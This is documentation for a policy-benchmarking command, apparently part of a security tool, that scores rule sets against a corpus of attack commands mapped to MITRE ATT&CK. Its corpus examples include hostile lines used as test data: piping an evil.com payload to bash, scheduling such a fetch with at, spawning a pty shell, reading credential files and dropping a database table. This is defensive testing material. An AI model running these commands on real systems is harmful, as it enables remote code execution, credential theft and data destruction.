rampart bench scores your policy against a corpus of real-world attack patterns. Each test case is tagged with severity and MITRE ATT&CK technique IDs, giving you coverage metrics that map to threat intelligence frameworks.
# Score the standard policy against all attack patterns
rampart bench
# Score a custom policy
rampart bench --policy ~/.rampart/policies/custom.yaml
# CI mode: fail if coverage drops below threshold
rampart bench --min-coverage 85 --strict
Rampart Policy Benchmark
Policy: standard.yaml (47 rules)
Corpus: 156 test cases
Coverage by Severity:
critical (24 cases): 100.0% (24/24)
high (67 cases): 97.0% (65/67)
medium (65 cases): 89.2% (58/65)
Coverage by Category:
credential-access: 100.0% (18/18) T1552, T1555
execution: 95.0% (19/20) T1059, T1204
exfiltration: 92.3% (12/13) T1048, T1567
persistence: 88.9% (16/18) T1053, T1543
defense-evasion: 85.7% (12/14) T1140, T1027
Weighted Score: 94.2%
(critical=3x, high=2x, medium=1x)
Uncovered Cases (5):
ID Severity Category Command
exec-042 high execution python3 -c "import pty; pty.spawn('/bin/bash')"
persist-017 medium persistence at now + 1 minute <<< "curl http://evil.com/sh | bash"
...
Run with --verbose for full case-by-case results.
| Flag | Default | Description |
|---|---|---|
--policy |
~/.rampart/policies/standard.yaml |
Policy file to benchmark |
--corpus |
Built-in corpus | Path to custom corpus YAML |
--os |
linux |
Filter cases by OS: linux, darwin, windows, * |
--severity |
medium |
Minimum severity to include: critical, high, medium |
--min-coverage |
— | Exit 1 if weighted coverage is below this percent |
--strict |
false |
Only count deny as covered (not watch or ask) |
--id |
— | Run only cases with this ID prefix |
--category |
— | Filter to a single corpus category |
--json |
false |
Output results as JSON |
--verbose |
false |
Include per-case results |
Add benchmarking to your CI pipeline to catch policy regressions:
# .github/workflows/policy.yml
jobs:
bench:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Install Rampart
run: curl -fsSL https://rampart.sh/install | bash
- name: Benchmark policy
run: rampart bench --min-coverage 90 --strict
If coverage drops below 90%, the workflow fails. Use --strict to ensure critical patterns result in deny, not just watch.
Each test case in the corpus is tagged with MITRE ATT&CK technique IDs:
# bench/corpus.yaml excerpt
- id: exec-001
severity: critical
category: execution
mitre:
- T1059.004 # Command and Scripting Interpreter: Unix Shell
command: "curl http://evil.com/payload | bash"
expect: deny
The benchmark output shows which techniques your policy covers. Use this for:
The weighted score prioritizes critical and high-severity patterns:
| Severity | Weight |
|---|---|
| critical | 3x |
| high | 2x |
| medium | 1x |
A policy that blocks all critical and high patterns but misses some medium-severity cases still scores well. This reflects real-world risk: credential theft (critical) matters more than overly verbose logging (medium).
Create a custom corpus for your specific environment:
# my-corpus.yaml
version: "1"
cases:
- id: myapp-001
severity: critical
category: credential-access
mitre: [T1552.001]
description: "Access production database credentials"
command: "cat /opt/myapp/config/db.env"
expect: deny
- id: myapp-002
severity: high
category: execution
mitre: [T1059.001]
command: "psql $PROD_DB -c 'DROP TABLE users'"
expect: deny
Run against your corpus:
rampart bench --corpus my-corpus.yaml
Run a subset of tests:
# Only Windows attack patterns
rampart bench --os windows
# Only critical severity
rampart bench --severity critical
# Only credential access category
rampart bench --category credential-access
# Only cases starting with "exec-"
rampart bench --id exec-
For programmatic processing:
rampart bench --json > results.json
{
"policy": "standard.yaml",
"ruleCount": 47,
"totalCases": 156,
"covered": 147,
"coveragePercent": 94.2,
"bySeverity": {
"critical": {"total": 24, "covered": 24, "percent": 100.0},
"high": {"total": 67, "covered": 65, "percent": 97.0},
"medium": {"total": 65, "covered": 58, "percent": 89.2}
},
"uncoveredCases": [
{"id": "exec-042", "severity": "high", "command": "..."}
]
}